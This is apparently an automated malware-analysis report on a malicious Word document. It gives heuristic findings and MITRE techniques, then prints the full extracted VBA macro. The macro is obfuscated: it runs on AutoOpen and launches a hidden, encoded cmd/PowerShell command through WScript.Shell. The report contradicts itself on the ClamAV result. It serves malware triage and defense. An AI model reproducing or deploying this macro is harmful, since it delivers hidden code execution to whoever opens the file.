Verdict: MALICIOUS
Risk Score: 310

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample contains a VBA macro that uses CreateObject("WScript.Shell") to run a command, indicating an attempt to execute arbitrary code. The macro's function `anPSGv` appears to construct a command string, likely for downloading and executing a secondary payload. The presence of legacy WordBasic auto-exec markers and the ClamAV detection further supports its malicious classification.
Heuristics (10)

- ClamAV: Doc.Malware.Valyria-6691545-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6691545-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script: `On Error Resume Next jtmGLN = CreateObject("WScript.Shell").Run(ChrW(3 + 4 + 12 + 7 + 41) + QAkOikvTmvT + MtTOpAX + anPSGv + pXWiwfIdwsc + BROtcSrK + SZTQTKpTCAd + jWoMkY + QWwtSLkUBC + lzLGhrvZjbCHm + kKHUuwH, 629956369 - 629956369) End Sub`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `On Error Resume Next jtmGLN = CreateObject("WScript.Shell").Run(ChrW(3 + 4 + 12 + 7 + 41) + QAkOikvTmvT + MtTOpAX + anPSGv + pXWiwfIdwsc + BROtcSrK + SZTQTKpTCAd + jWoMkY + QWwtSLkUBC + lzLGhrvZjbCHm + kKHUuwH, 629956369 - 629956369) End Sub`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen() On Error Resume Next`
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9826 bytes |

SHA-256: 6ec61a1344e43d6c84b527180dfdf5edea89ae77b51df508a864d338bb5b89d3

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 99 of 154 identifiers look randomly generated (e.g. 'sGrLOCqUmvcwGM'); 2 string-concatenation chain(s), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "zdaaVfsaffO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aMAmkvSdMMujQ"
Function anPSGv()
On Error Resume Next
Error Hex(GFiCCj)
DCSmZVYFY = "MD /v:^" + " ^ " + "^ /c" + " " + CStr(Chr(sGrLOCqUmvcwGM + KWrQMaAIT + 34 + EjWiwQjDKdazk + tXjNZLDsPXuIh)) + " ^Se^T" + " ^ ^ " + "^" + "kL==" + "=^AAg" + "A^A^IA^"
Error Sin(96743 - 76100 - 18460 + ldKmz)
Error CByte(186609479)
Error Sqr(tIJaXW)
csLOnKCs = "AC^Ag^" + "A^A^IA" + "^ACAgA^" + "A" + "IA^" + "AC^"
Error Rnd(442)
rlGMiOr = "A^" + "g^A^AI^" + "AAC^A" + "g^A^" + "A^I" + "^A^AC^" + "AgAA" + "I" + "^A0HA^9" + "Bwe^" + "A^g" + "^G^" + "A^jB^"
Error Str(65009 + TDWTX)
Error CDate(jcIQw)
Error Atn(3)
Error Oct(ZkvGu)
Error CVar(42916114)
KtbDorz = "A" + "dAEGAj^" + "B^Q" + "f^A" + "^" + "sDA" + "r^BQY^A" + "^UGA^yB" + "g^Y^As^" + "DAmBg" + "RA^E" + "^H" + "Ak^"
Error Rnd(iKjiMS)
Error Sin(56533 / ppiHq)
PpzLWHrIBjI = "A^A^I" + "A^0" + "^" + "GAlB^A^" + "d" + "^A^" + "k^EAt" + "A^Q^Z" + "^A^s^G" + "AvB^" + "gd^A4G" + "A^JB^wO" + "A^kC"
Error Round(301)
bASJurhML = "^A" + "^m^BgR^" + "A^EHA^" + "k^AA^" + "I^" + "A^wC" + "^AW^Bg" + "T^AQ^G" + "^AkAA" + "^KAU^G^"
Error Fix(AJZiXu)
Error CDec(8708)
kLwTCtzKEBn = "AsB" + "Q^a" + "A^Y^EA" + "^k^BQ" + "Y^A^" + "8GAs" + "Bg^"
anPSGv = DCSmZVYFY + csLOnKCs + rlGMiOr + KtbDorz + PpzLWHrIBjI + bASJurhML + kLwTCtzKEBn
Error TimeValue(97667 / 15749 + 32668 - 96266)
Error CStr(28498 / bIhapM)
Error TimeValue(8)
End Function
Function pXWiwfIdwsc()
On Error Resume Next
Error CDbl(68)
IODil = "bAc" + "H" + "^Av" + "BARA^4C" + "^" + "A" + "^" + "H^B^QSA" + "^MH"
Error Fix(HRMYO)
Error CDbl(327000462)
Error Log(35282 / jBtcAp + 91280 / 40690)
Error Int(hAjBC)
jJidPini = "A" + "^k^A^" + "w^eAkH^" + "A^y" + "BAdA" + "s^H^A" + "p^Aw" + "^T^A^" + "IE" + "^AmB^AJ" + "^" + "AAC"
Error Int(431794797)
Error Hex(16)
Error Log(3509)
UXUwQfEo = "A^u^" + "B" + "Qa^A" + "^AC^" + "A" + "WB^" + "gTA^Q" + "^GAkA" + "^A^"
Error Hex(siTbK - qEZQrv)
Error Str(30689 * FcMYNt)
Error CVar(436)
LuLopwAXB = "K^AgG" + "^" + "Aj" + "^BQ^" + "Y^"
Error CDbl(85381 - 59393 / rUHHZ * VZCpA)
qZOCs = "A^U^G" + "AyBw" + "^bAY^" + "G^" + "A7^A^w"
Error Tan(3)
Error Tan(PYHCh)
Error CCur(SoIEH - HnqTt)
CaAWhn = "^JAUGA" + "4BQ^Z" + "A4CAn^A" + "^w^" + "K" + "As^E^AM" + "^B" + "^Ac^" + "A^QCAr" + "A^wJ^Aw" + "^" + "FAn" + "^A^w^"
Error CVar(jKEaj)
Error Tan(AlEzFk - AEYPSj)
hFVfzwnRatq = "KA^M" + "GA^pB^A" + "^bA^IG^" + "A" + "1^BAcA" + "oD^" + "A2Bg^bA"
Error Log(7)
Error Cos(VOBROz)
WCWiZC = "^UG^A^" + "kA^Q" + "^PA" + "^Y^GA^G" + "BQc" + "^AQC" + "A7^AwJ" + "^A^Y^D^" + "A^" + "1^A^wNA"
Error CDec(82)
Error Cos(dHIpi)
Error Sqr(313)
Error CDate(45231 + 71605 * WzjVw * Skjoo)
tdfktpHCjNY = "cCAg^AQ" + "^" + "P" + "^A" + "^AC" + "AL^BAT" + "^A^A" + "^H^A^" + "k^Aw" + "^OA^k"
Error CStr(JsjNA)
Error TimeValue(52572 - dLjjOj * 49909 / FlrXR)
Error Val(jETaAX / UvuWn)
VtaakSBSkAP = "C^AnA^A" + "Q^AcCA" + "oA^AdA" + "^k^GA" + "^s^" + "BA" + "c^AM" + "^FA^uA"
Error Month(20)
Error TimeValue(930)
JqlVWL = "^w^J" + "AA^" + "HAO^B" + "^g^eA^" + "I^" + "D^" + "A" + "Y^B" + "^ga" + "AgE^AvA"
pXWiwfIdwsc = IODil + jJidPini + UXUwQfEo + LuLopwAXB + qZOCs + CaAWhn + hFVfzwnRatq + WCWiZC + tdfktpHCjNY + VtaakSBSkAP + JqlVWL
Error CStr(12316 + KswYD)
Error Log(ttppV)
Error Fix(9)
End Function
Function BROtcSrK()
On Error Resume Next
Error Fix(44745 * LjSQvW * 81649 / RsQvL)
Error CByte(YbSAP)
Error CCur(25580 + JzACsl)
GBkwbsss = "Q" + "b^A^" + "8^" + "G^A" + "^j^" + "BgLAM^H" + "Ay^B^QZ" + "A^Q^GA^" + "h^B" + "gc^A"
Error Str(899)
Error Sgn(7636)
VPVwsqcCz = "^" + "QH" + "A^l" + "^B^" + "Q^e" + "^A^UG" + "A" + "r^B^wdA" + "^EGAo"
Error Str(GnAuZZ * rcZwtm - plAVi / OkujJK)
Error LCase(312)
Error Log(MRRAH)
bMhHzKH = "BgLAc" + "H^A^l" + "B" + "gb^A^8C" + "^Av^A^g" + "^O^" + "AA^HA0B" + "A^" + "d^" + "A^gG^A" + "^AB^ga"
Error Str(GJakX)
Error Hex(508)
Error CDbl(3)
ENJYrJci = "^" + "A" + "^M^" + "H^A^6" + "^B^A^" + "d^A^AF^" + "AvA" + "^Qb^"
Error Sqr(87014 + WsQlOO + zzNqjL / SUCdM)
Error Sqr(83558 * kSNwT + 24622 - DbjAm)
mtiHWw = "A^8G" + "A^jB^gL" + "^A^g^G" + "^Aj" + "^Bg^b^A" + "E" + "GAyB^" + "gcA"
Error Log(vQwpH * NiYdQ + NiBMdH * VQkddJ)
Error Int(LwJQl)
Error Val(66275621)
Error CVar(zAoZHq)
Error Hex(pMTTL)
tqmhJmul = "^" + "UGA" + "r^B" + "^w^Y" + "AE" + "^" + "G^AoB" + "^w^L^A"
Error Sin(318921671)
ZJwKHmU = "^8" + "CA6^A^A" + "c^AQ" + "^H" + "A0B^A^a" + "A^A" + "E^A^j" + "BQ^WAo" + "H^" + "A^YBQ" + "UA8" + "C"
BROtcSrK = GBkwbsss + VPVwsqcCz + bMhHzKH + ENJYrJci + mtiHWw + tqmhJmul + ZJwKHmU
Error Fix(36595 / FKmTfd)
Error Atn(fPNfG * hAYDA * lzvQJq * VsJIL)
Error Atn(377094896)
End Function
Function SZTQTKpTCAd()
On Error Resume Next
Error Log(490405347)
Error Round(139478161)
fObbPFPrllh = "^At^Bw" + "bA^M^" + "G^AuAg" + "^bA8" + "^G" + "^ApB" + "AdAM" + "G^Al^" + "BgdA^4" + "G^A" + "v^"
Error CDec(414307431)
Error LCase(4171)
Error Hex(186)
Error Atn(699)
TzjiVVDZZSW = "Bw^Y^A" + "EG^" + "A^q^BwZ" + "A^8^GA^" + "qBwLA8C" + "A6^A^A" + "c^" + "AQH^A" + "^" + "0B^" + "AaA^A"
Error Log(znNzGS - 32172 - EUoIPV - 18683)
Error CCur(9026)
kPWftPRwjK = "^E^A" + "^5B^QQ" + "^A^" + "oG" + "A^U^B" + "Q" + "Q^A" + "g"
Error Hex(WGCNu)
Error Second(70)
Error Hex(DJVCEK)
hiimb = "GA" + "vA^" + "QbA8GA" + "j^Bg" + "^LAA"
Error Sqr(1535)
Error Log(VOatLH - 94918 / lXrLE * VYQTz)
Error Tan(cMiNn)
Error Int(kzuEn / oLjdu / PXiXvr / ChjtA)
BthSJqFoJ = "^H^" + "A1B^" + "w^b^A^I" + "H^A" + "nB^w^" + "Y^Ak" + "G"
Error Round(88773 * jWijkE + 7991 * 87610)
Error CDate(tCvfY / fmncn)
Error Cos(327)
Error CVar(JpnZCK)
Error Rnd(DvJnzV)
XHVPCpNiXT = "A^zB^Q^" + "dA0^G^A" + "l^B^w" + "cAI^H" + "^A^l^B"
Error Sgn(uuITMW)
Error Val(bSkNw - 25626)
Error Cos(25)
SVrujvIv = "^" + "g^dA" + "^U^G^" + "A^yB^wL" + "A^8C^A^" + "6AAcAQ^" + "H^" + "A^0^BA" + "^a"
SZTQTKpTCAd = fObbPFPrllh + TzjiVVDZZSW + kPWftPRwjK + hiimb + BthSJqFoJ + XHVPCpNiXT + SVrujvIv
Error Second(54)
Error CVar(vhjjDf - kzBqDf + JzuaCV * LNwSR)
End Function
Function jWoMkY()
On Error Resume Next
Error CDbl(778)
Error Oct(93340 * oiioDL)
KGjZM = "A" + "^AEAO^B" + "g" + "b" + "AcF^AVB" + "^QV"
Error Month(XmZpPX)
Error CDbl(JvEjZu / RYzWP + wkZzL + RuXLzz)
Error CVar(11727 + iUNzWm - 45262 / ufzlwd)
Error LCase(20142 - zTlHV - kUlRlX / nCaCYB)
wsLhUHpqUO = "^A^" + "8C^AtB" + "wb" + "AM^G^Au" + "A" + "gc^A^U" + "G^A"
Error CBool(ZNqZk - PGjWO)
Error LCase(91465 / YnlsYm + 72786 * HmXXOr)
Error Second(vZXPH)
mqOYza = "0B^g" + "b^A" + "UG^AjBA" + "^bA^EGA" + "0B^g^b^" + "AUGA" + "^k^" + "BQ^ZA" + "wGAs^" + "B" + "^Qa^A" + "Y^H"
Error Hex(frjdsb * zQwwni + jbJBaF + MidWZk)
Error CByte(6677)
Error LCase(258941932)
Error Rnd(lDOPS)
SPwSPWmwij = "Au^B" + "^QZA" + "wGAn^B" + "^Q" + "^YA" + "^k^" + "GA^0B" + "wb^AM^" + "G^A" + "^z^" + "Bw^L^" + "A^8CA6"
Error CDbl(876)
Error Round(9511 / kCPSJF / 13087 + qFhiv)
Error CByte(3)
Error CDate(23758 / 78955 + 90414 + nnvYw)
Error Month(PMCOr)
DzBBhW = "AA" + "c^A^Q^" + "H^" + "A0B^A" + "a" + "^AcCA9" + "^AwTA" + "IE^Am" + "BAJA^sD" + "A^0Bg" + "b" + "A^" + "U^G^A^p"
Error Second(31089 / EvqaAn)
Error Cos(jMiMC)
NuwXPRBNnuf = "B^Ab^AM" + "^" + "E^A^i" + "^B^Q" + "^ZAc" + "^F^A" + "u^A^A^d" + "^A^U" + "^G^A^" + "OBA" + "^I^A^QH" + "A^jB^"
Error Tan(LLWjN / 55764 + CXJkoh - UWmdO)
Error CDate(rjYbC)
Error TimeValue(GLMChI)
Error CByte(fTCFO)
Error Hex(qDKlT / IZZvGq + 60140 / TdzfJw)
lBrSEYjNjwd = "Q^ZAo" + "^GAi^B" + "wbA^0" + "C^A" + "3" + "B"
jWoMkY = KGjZM + wsLhUHpqUO + mqOYza + SPwSPWmwij + DzBBhW + NuwXPRBNnuf + lBrSEYjNjwd
Error Log(HZjJiG)
End Function
Function QWwtSLkUBC()
On Error Resume Next
Error Round(21824 * ccwvci - 80147 / lmHbRB)
Error Atn(860)
Error Log(331)
vRsBizi = "^Q" + "Z^A4^G" + "^A" + "^9^AwR" + "^" + "A^k" + "^EA^z" + "B^AJ^" + " ^e^- ^" + "l^le" + "^h^sre^" + "w^o"
Error Rnd(trquWD - 23824 - 75718 / iTUIvO)
pEpfOAOwucB = "^p& " + "^F^" + "oR " + "/^" + "l "
Error Atn(0)
Error CByte(634)
Error TimeValue(250)
Error CByte(AUwbJ + 50189)
cTaFuifzLjd = "%^3" + " ^in (" + "^10" + "^29 ^" + ",^ -" + "^1, ^" + " ^" + "0) " + "^dO " + " ^"
Error Sin(GCfqSk + icrQqG - 38613 + SwfCw)
TiIOGwDOW = "s" + "^E^T" + " ^F^" + "Q" + "n=" + "!^F^Qn!" + "!^kL" + ":~ %^3,"
Error CCur(62)
Error CStr(CvYsP)
Error Rnd(92503 / FItYR * RciQjt * GJOiJr)
Error Tan(185 / fmDhc - trWwjT / iMwAc)
oXzfT = " " + " 1!& ^" + "I^" + "F %^3 " + " "
Error Tan(66924 + JdwlK / 27811 - sUXAc)
ZLYYIhTqsFC = "=^= ^" + "0 C^a^l" + "^L %" + "^F^" + "Qn:^" + "~^ " + "^ ^"
Error Tan(MXjmti + XvbBi * 17321 - uzfzO)
Error CByte(jIidQ)
iQTnXPrNz = " 5% " + " " + " " + CStr(Chr(jstKmkQQ + XJXkjYHzXjc + 34 + vjArHHD + lDuiEZi)) + " "
QWwtSLkUBC = vRsBizi + pEpfOAOwucB + cTaFuifzLjd + TiIOGwDOW + oXzfT + ZLYYIhTqsFC + iQTnXPrNz
Error Rnd(KFFbRQ)
Error Atn(6973)
Error Log(ppwGBK)
End Function
Attribute VB_Name = "NZFfqwbXSciAP"
Sub AutoOpen()
On Error Resume Next
jtmGLN = CreateObject("WScript.Shell").Run(ChrW(3 + 4 + 12 + 7 + 41) + QAkOikvTmvT + MtTOpAX + anPSGv + pXWiwfIdwsc + BROtcSrK + SZTQTKpTCAd + jWoMkY + QWwtSLkUBC + lzLGhrvZjbCHm + kKHUuwH, 629956369 - 629956369)
End Sub